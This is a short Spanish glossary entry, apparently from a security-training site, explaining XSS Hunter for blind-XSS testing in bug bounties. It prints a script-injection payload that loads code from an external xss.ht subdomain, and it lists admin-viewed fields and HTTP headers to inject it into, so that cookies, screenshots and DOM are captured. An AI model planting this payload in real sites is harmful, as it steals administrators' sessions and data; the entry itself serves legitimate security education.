Nuevos labs cada semana — Accede a todos desde 5€/mes

XSS Hunter

Informativo

XSS Hunter

Definición

XSS Hunter es una herramienta especializada para detectar y validar vulnerabilidades de Cross-Site Scripting (XSS), especialmente XSS ciego (Blind XSS). Proporciona un payload JavaScript que, al ejecutarse en el navegador de una víctima, envía automáticamente una captura de pantalla, cookies, URL, DOM y más al panel del hunter. Es esencial para detectar XSS en paneles de administración donde el atacante no tiene acceso visual.

Impacto

Detección de Blind XSS en paneles de administraciónCaptura automática de screenshots, cookies y DOMValidación de XSS almacenado en contextos no visibles para el atacanteRegistro de URL exacta donde se ejecuta el payloadPrueba de concepto visual automática para reportes de bug bounty

Ejemplos

Uso de XSS Hunter para Blind XSS

El payload de XSS Hunter carga un script externo desde tu subdominio personalizado. Cuando se ejecuta en cualquier contexto (incluso uno que nunca ves, como un panel de admin), registra toda la información necesaria para demostrar el impacto: captura de pantalla, cookies, la URL donde se ejecutó y el HTML completo de la página.

<!-- Payload de XSS Hunter inyectado en formularios -->
"><script src=https://tu-id.xss.ht></script>

<!-- Inyectar en campos que los admins revisan: -->
<!-- - Formularios de contacto -->
<!-- - Campos de nombre de usuario -->
<!-- - Tickets de soporte -->
<!-- - Headers HTTP (User-Agent, Referer) -->

<!-- Si un admin abre un panel que renderiza tu input, -->
<!-- XSS Hunter captura: screenshot, cookies, URL, DOM -->